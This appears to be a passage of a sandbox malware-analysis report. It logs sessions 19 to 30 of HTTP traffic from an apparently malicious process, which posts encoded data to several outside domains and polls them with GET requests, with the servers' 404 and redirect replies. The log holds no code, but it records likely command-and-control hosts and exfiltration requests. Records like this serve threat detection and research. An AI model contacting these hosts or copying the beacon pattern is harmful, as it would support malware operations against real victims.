                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.4 | 49760 | 5.144.130.52 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:40.059210062 CEST | 10822 | OUT | POST /ifo8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.aflaksokna.com
                      Origin: http://www.aflaksokna.com
                      Referer: http://www.aflaksokna.com/ifo8/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8= [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.4 | 49761 | 5.144.130.52 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:47:42.604516029 CEST | 454 | OUT | GET /ifo8/?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.aflaksokna.com
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:47:52.345927954 CEST | 1166 | IN | HTTP/1.1 302 Found
                      Connection: close
                      content-type: text/html
                      content-length: 771
                      date: Tue, 03 Sep 2024 10:47:52 GMT
                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                      location: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?TJY8=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&3L7=cfJLLBshpRPDzp
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.4 | 49762 | 161.97.168.245 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:05.540270090 CEST | 723 | OUT | POST /p6o9/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/p6o9/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=UkDfb8hhEzv8KfS2TMlXEMlVytCjmazTYjZuURwBfrx0bQOq44yhuVPzq18unu/re8VaVdkHRYuPObIHgfGdxWxL0bJbphyHJ3lUuGWP4U7wPRc+fhjmOs/8y9991OD5iwsV5zSycy71KmxNc9K+aECoBgPaoFkIXxTXHj/SNf5oZhUDeITG6vtHieSy3jiUvA==
                      Sep 3, 2024 12:48:06.104298115 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:48:06 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Sep 3, 2024 12:48:06.104311943 CEST | 370 | IN | Data Raw: [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.4 | 49763 | 161.97.168.245 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:08.091609955 CEST | 743 | OUT | POST /p6o9/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/p6o9/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=UkDfb8hhEzv8K8a2Wr5XMMlS3tCj9KzXYjVuUUArfZl0byWq3Zyh7VPzlV8rju/we8Z8VdoHRY6POekHgM+SwGxJ87JZkByHJ3lUuGC14UjwOhM+O13pHM/zlN994uD9iwtC5yeYc0n1KnhNcMKxB0CuewO2hh9mbjK9HQLdOs9ORHFZP5yRovJ0/ZbG6gfd0Lhc95moHqhgWXVG7uaDuFo=
                      Sep 3, 2024 12:48:08.668709040 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:48:08 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Sep 3, 2024 12:48:08.668730021 CEST | 370 | IN | Data Raw: [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.4 | 49764 | 161.97.168.245 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:10.834806919 CEST | 10825 | OUT | POST /p6o9/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/p6o9/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8= [TRUNCATED]
                      Sep 3, 2024 12:48:11.402501106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:48:11 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Sep 3, 2024 12:48:11.402761936 CEST | 370 | IN | Data Raw: [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.4 | 49765 | 161.97.168.245 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:13.384850979 CEST | 455 | OUT | GET /p6o9/?TJY8=Zmr/YL1wBhH5EvOYa+lfR7FMwZSqpeTcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/xiBUzJxWpUvsREBgoFXOyFDTB09pGlr6B+k=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.qiluqiyuan.buzz
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:48:13.979079008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:48:13 GMT
                      Content-Type: text/html; charset=utf-8
                      Content-Length: 2966
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: "66cd104a-b96"
                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                      Sep 3, 2024 12:48:13.979094982 CEST | 224 | IN | Data Raw: [TRUNCATED]
                      Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                      Sep 3, 2024 12:48:13.979116917 CEST | 1236 | IN | Data Raw: [TRUNCATED]
                      Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                      Sep 3, 2024 12:48:13.979130983 CEST | 224 | IN | Data Raw: [TRUNCATED]
                      Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s">
                      Sep 3, 2024 12:48:13.979140997 CEST | 250 | IN | Data Raw: [TRUNCATED]
                      Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.4 | 49766 | 3.33.130.190 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:19.030272007 CEST | 711 | OUT | POST /45sz/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.omexai.info
                      Origin: http://www.omexai.info
                      Referer: http://www.omexai.info/45sz/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=9m4WgTCjo+FGTDe5QhzfQjYZ/m/kPKYr5NBARUtX4FKQCgX9rVVNfMrsJXpEVE+OOTKmjhq1OLhENH0AE70DhtbtB7E99xNji/MgDKS0Jh3zWhOwrqjuzcQPkneQmDS9Y87Jgqfk02fazqxv+H0q+Rqihn1EEQteCYgr3OHIhaLWYVqbp6O/xfGdXmUq9bisVw==


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.4 | 49767 | 3.33.130.190 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:21.576808929 CEST | 731 | OUT | POST /45sz/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.omexai.info
                      Origin: http://www.omexai.info
                      Referer: http://www.omexai.info/45sz/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43uQCAn96kVNeMrsB3pLbk/COTHbjkS1OL1ENGEAEIMMntbvObE/zRNji/MgDL2SJhvzWwewpILpwcQOhXeQiDS5Y87vgv3e0wDazu5vwyAplhrnln0ISQMWKNphoIr2orWzdT7B4LvojfiuKhdewYflOyzNhBEloj9u1o5XeuY0KDc=


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      27 | 192.168.2.4 | 49768 | 3.33.130.190 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:24.193367004 CEST | 10813 | OUT | POST /45sz/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.omexai.info
                      Origin: http://www.omexai.info
                      Referer: http://www.omexai.info/45sz/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Ascii: TJY8= [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      28 | 192.168.2.4 | 49769 | 3.33.130.190 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:26.749244928 CEST | 451 | OUT | GET /45sz/?3L7=cfJLLBshpRPDzp&TJY8=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.omexai.info
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:48:27.189043999 CEST | 399 | IN | HTTP/1.1 200 OK
                      Server: openresty
                      Date: Tue, 03 Sep 2024 10:48:27 GMT
                      Content-Type: text/html
                      Content-Length: 259
                      Connection: close
                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3L7=cfJLLBshpRPDzp&TJY8=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY="}</script></head></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      29 | 192.168.2.4 | 49770 | 218.247.68.184 | 80 | 1852 | C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:32.814332008 CEST | 705 | OUT | POST /yzen/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.dfbio.net
                      Origin: http://www.dfbio.net
                      Referer: http://www.dfbio.net/yzen/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 44 69 6f 47 48 54 6e 55 57 53 33 44 65 58 6a 30 77 61 70 6d 66 76 66 75 53 61 72 39 63 6c 4b 55 6a 70 64 62 39 66 4b 30 59 70 74 65 56 37 31 56 37 78 41 58 46 76 2b 6f 7a 37 6c 67 56 6e 35 6f 33 55 71 38 65 62 64 6c 6c 59 43 6e 64 72 69 47 58 36 44 36 6b 72 2b 7a 45 6d 78 6d 34 65 51 69 4e 61 4e 62 67 57 61 32 66 6e 37 57 49 61 75 57 78 78 77 35 62 6c 70 6e 42 35 79 58 4b 72 37 35 4a 59 63 73 47 72 5a 62 51 30 79 56 54 4a 7a 69 4a 61 30 6e 52 5a 51 59 39 42 6b 37 78 41 63 32 77 58 62 4e 48 36 36 64 55 39 78 4c 36 59 44 30 2f 4f 46 42 63 77 3d 3d
                      Data Ascii: TJY8=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nRZQY9Bk7xAc2wXbNH66dU9xL6YD0/OFBcw==
                      Sep 3, 2024 12:48:33.115880966 CEST | 705 | OUT | POST /yzen/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.dfbio.net
                      Origin: http://www.dfbio.net
                      Referer: http://www.dfbio.net/yzen/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 44 69 6f 47 48 54 6e 55 57 53 33 44 65 58 6a 30 77 61 70 6d 66 76 66 75 53 61 72 39 63 6c 4b 55 6a 70 64 62 39 66 4b 30 59 70 74 65 56 37 31 56 37 78 41 58 46 76 2b 6f 7a 37 6c 67 56 6e 35 6f 33 55 71 38 65 62 64 6c 6c 59 43 6e 64 72 69 47 58 36 44 36 6b 72 2b 7a 45 6d 78 6d 34 65 51 69 4e 61 4e 62 67 57 61 32 66 6e 37 57 49 61 75 57 78 78 77 35 62 6c 70 6e 42 35 79 58 4b 72 37 35 4a 59 63 73 47 72 5a 62 51 30 79 56 54 4a 7a 69 4a 61 30 6e 52 5a 51 59 39 42 6b 37 78 41 63 32 77 58 62 4e 48 36 36 64 55 39 78 4c 36 59 44 30 2f 4f 46 42 63 77 3d 3d
                      Data Ascii: TJY8=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nRZQY9Bk7xAc2wXbNH66dU9xL6YD0/OFBcw==
                      Sep 3, 2024 12:48:33.766237974 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: wts/1.7.0
                      Date: Tue, 03 Sep 2024 10:48:33 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: private
                      Content-Encoding: gzip
                      Strict-Transport-Security: max-age=31536000
                      Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                      Data Ascii: 86cX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                      Sep 3, 2024 12:48:33.766331911 CEST | 1217 | IN | Data Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                      Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AMNGD'\`X"c


                      Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 49771 | Destination IP: 218.247.68.184 | Destination Port: 80 | PID: 1852 | Process: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 3, 2024 12:48:35.355160952 CEST | 725 | OUT | POST /yzen/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.dfbio.net
                      Origin: http://www.dfbio.net
                      Referer: http://www.dfbio.net/yzen/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 43 44 34 47 55 43 6e 55 58 79 33 45 56 33 6a 30 37 36 70 69 66 76 6a 75 53 62 2f 74 63 58 75 55 6a 4d 68 62 2b 61 6d 30 64 70 74 65 65 62 31 55 31 52 41 63 46 76 36 57 7a 2b 64 67 56 6e 46 6f 33 56 61 38 64 71 64 71 6d 6f 43 6c 45 62 69 41 54 36 44 36 6b 72 2b 7a 45 6d 6b 44 34 65 59 69 4f 71 64 62 69 30 79 31 53 48 37 52 4a 61 75 57 38 52 77 39 62 6c 70 52 42 38 71 75 4b 74 33 35 4a 64 67 73 43 70 78 59 46 6b 79 54 4d 35 79 33 45 36 70 43 56 4d 31 69 33 79 34 6e 35 7a 30 4d 31 52 4b 58 57 4c 62 4b 47 39 56 34 6e 66 4b 41 79 4e 34 49 48 32 51 65 4f 2f 57 48 75 62 45 54 59 6d 47 31 6d 76 77 72 48 53 34 3d
                      Data Ascii: TJY8=D/9dVfJYvq9GCD4GUCnUXy3EV3j076pifvjuSb/tcXuUjMhb+am0dpteeb1U1RAcFv6Wz+dgVnFo3Va8dqdqmoClEbiAT6D6kr+zEmkD4eYiOqdbi0y1SH7RJauW8Rw9blpRB8quKt35JdgsCpxYFkyTM5y3E6pCVM1i3y4n5z0M1RKXWLbKG9V4nfKAyN4IH2QeO/WHubETYmG1mvwrHS4=
                      Sep 3, 2024 12:48:36.350646019 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: wts/1.7.0
                      Date: Tue, 03 Sep 2024 10:48:36 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: private
                      Content-Encoding: gzip
                      Strict-Transport-Security: max-age=31536000
                      Data Raw: 34 38 36 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 